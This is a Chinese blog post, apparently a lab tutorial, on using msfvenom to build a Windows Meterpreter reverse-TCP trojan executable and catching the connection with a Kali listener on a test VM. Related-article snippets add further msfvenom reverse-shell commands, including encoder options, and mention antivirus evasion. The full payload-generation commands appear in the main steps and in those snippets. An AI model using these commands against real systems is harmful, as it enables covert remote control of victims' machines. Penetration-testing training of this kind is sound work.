msfvenom生成木马的简单利用

最新推荐文章于 2024-05-05 21:55:40 发布
最新推荐文章于 2024-05-05 21:55:40 发布
阅读量1.9k 收藏 5
点赞数
分类专栏: kali 文章标签: windows 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43966088/article/details/126952341
版权

msfvenom生成木马的简单利用

1、简介

本篇文章将会用msfvenom生成一个windows下可执行木马exe的文件,用kali监听,靶机win10运行木马程序,实现控制靶机win10。

2、实验环境

1、一台kali虚拟机 ip为192.168.101.5
2、一台win10虚拟机

3、实验步骤

1、首先使用msfvenom生成一个可以被windows执行的exe木马文件。
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.101.5 lport=4444 -f exe >shell.exe
2、把刚刚生成的exe木马文件传输到我们的win10靶机上
3、在kali上输入msfconsole打开metasploit
4、metasploit配置及监听
在这里插入图片描述
在这里插入图片描述
监听好后我们就可以用win10靶机点击我们的木马程序,此处木马程序多次被防火墙拦截
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

谈一场梦
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
msf之msfvenom的使用—使用Kali渗透工具生成远控木马
GUN_C的博客
11-15 3620
msfvenom的使用
E025-渗透测试常用工具-使用msfvenom生成木马进行渗透测试.pdf
12-02
以下是对`msfvenom`的详细解释以及如何使用它生成木马进行渗透测试。 首先,`msfvenom`允许测试者创建不同类型的payload,这些payload可以在目标系统上执行特定的任务,如建立Meterpreter会话、执行命令或下载其他...
kali——勒索病毒metasploit
weixin_64033212的博客
04-22 451
它会向目标网络中的每个 IP 地址发送 ICMP echo 请求包,以查看哪些主机是活跃的(即在线)。这个命令不会进行端口扫描,只关注于发现哪些 IP 地址对应的主机是响应 ICMP 请求的。的一个主机发现技术,它使用 ICMP echo 请求和 TCP ACK 包来探测主机。参数本身是一个快速的方式来确定哪些主机是活跃的,但它默认使用 ICMP echo 请求和 TCP SYN 包来探测主机。命令会执行一个仅主机发现的扫描,使用 ICMP echo 请求和 TCP ACK 包来探测网络中的活跃主机。
Kali Linux渗透测试实战:Msfvenom木马生成与攻防实战教程
08-19
1、课程概要       本课程主要分享Kali Linux渗透测试实战:Msfvenom生成木马攻防实战教程! 2、课程目标         本课程致力于帮助广大学员掌握Msfvenom木马生成与攻防实战技巧! 3、适合人员        本课程适合兴趣计算机与网络安全技术的学员观看学习! 4、特别说明        本课程支持一次购买,永久观看,请广大学员们放心选购!
如何使用kali中msfconsole软件生成木马(shell和meterpreter类型)投放至本机进行控制???超级详细!!!
2301_77578012的博客
05-05 532
msf的使用
msf上制作简单windows exe木马
weixin_73942557的博客
10-25 703
msf制作Windows可执行程序木马利用。首先利用用组件msfvenom制作木马。然后将生成木马放到你准备的靶机上面。设置payload、监听IP和端口。在靶机上运行生成木马文件。进入msfconsole。-p设置payload。然后设置返回IP和端口。-f设置生成木马的类型。使用exploit利用。-o设置路径和文件名。目前就已经提权成功了。
msfconsole之制作windows木马并成功获取shell
qq_56228347的博客
11-22 3525
msfconsole制作windows木马并上线获取控制权限
MSF生成木马木马简单使用
爱喝水的仙人树的博客
11-03 8691
本文将介绍有关MSF木马模块的简单使用方式,介绍常见的几种木马生成方式,如有不对的地方,欢迎大家在评论区指正。由于本文仅对部分模块的简单使用进行说明,更多信息请参考官方网址MSFVENOM环境配置说明1. 使用kali虚拟机和Win7(可以低于此版本)虚拟机2. kali虚拟机建议使用最新版本并将系统软件更新至最新版本3. Win7虚拟机务必关闭网络防火墙,不建议使用Win7及以上版本系统,简单木马会被直接删除4. 查看两台虚拟机的IP地址,确保两台虚拟机之间可以ping通。
msfvenom获取shell
01-03
msfvenom各平台生成木马大全: windows: msfvenom -a x86 –platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b ‘x00x0axff’ -i 3 -f exe -opayload....
68-68.渗透测试-生成木马获取shell(Windows).mp4
最新发布
05-10
68-68.渗透测试-生成木马获取shell(Windows).mp4
漏洞的利用木马.pdf
04-18
漏洞的利用木马:缓冲区溢出漏洞利用,数据库漏洞利用(MySQL)......
木马与病毒
03-26
木马与病毒的定义、区别和防范方法 在计算机安全领域中,木马和病毒都是常见的恶意代码,但它们之间有着明显的区别...定时进行木马与病毒的预防与查杀,合理利用杀毒软件与木马专杀工具,都是保障电脑安全的重要步骤。
kali-msfvenom生成远控木马
Ryongao
01-16 717
本文章仅限于网络安全教学,严禁用于非法途径。若有人因此作出危害网络安全行为后果自负,与本人无关。
利用msfvenom制作木马程序(不免杀)
Nanyeer的博客
03-29 1514
制作木马程序进行远程控制(不免杀)
msf免杀木马生成
qq_66985187的博客
07-04 2314
等黑客技术,所以难度很高,一般人不会或没能力接触这技术的深层内容。其内容基本上都是修改病毒、木马的内容改变特征码,从而躲避了杀毒软件的查杀。set payload windows/meterpreter/reverse_tcp#设置攻击位。本章是通过msf(msfvenom)命令实现免杀的操作。由于免杀技术的涉猎面非常广,其中包含反。简称"免杀",它指的是一种能使病毒木马免于被。补充:常见的后门生成方式!在kali中生成常见的木马命令。
kali完成一次android渗透测试
weixin_51715176的博客
05-05 2568
一次简单的渗透测试
【网络安全】 MSF生成木马教程
一直被模仿,从未被超越
03-13 1270
1、当客户端点击木马后,Kali 成功获取。2、启动Apache,方便客户端下载。1、在Kali机器上面生成木马。本例用的是 Themida。二、Kali 开启监听。2、设置Payload。
Ettercap嗅探
MYG_Ping的专栏
07-29 962
1. Ettercap是什么? Ettercap最初只是作为一个局域网嗅探工具(sniffer)。但是,随着时间的推移和工具的开发完善,Ettercap提供了越来越多的功能特性,使它变成了一款强大的、灵活的中间人攻击工具。(此段来自Ettercap手册)。 先把Ettercap的使用语法放出来: Usage: ettercap [OPTIONS] [TARGE...
kali msfvenom生成木马
qq_33391644的博客
02-06 6135
在kali2.0的环境上,因为msfpayload没有了,被整合进了msfvenom,所以这就只写一些关于msfvenom的东西。 这里就只是记录下生成一个程序的过程。 msfvenom msfvenom是msfpayload,msfencode的结合体,可利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线 1.首先还是得打开postgresqlro...
msfvenom 生成windowsexe木马
06-02
生成Windowsexe木马,可以使用msfvenom命令,如下所示: ``` msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> -f exe > payload.exe ``` 其中,`windows/meterpreter/reverse_tcp`是使用Meterpreter反向TCP连接的payload。`LHOST`是攻击者的IP地址,`LPORT`是攻击者监听的端口号。`-f exe`指定输出为exe文件,`> payload.exe`将输出重定向到一个名为payload.exe的文件中。 在生成exe文件中包含了一个Meterpreter shell,可以用于远程控制目标系统。请注意,使用这种工具进行攻击是非法的,仅用于测试和教育目的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值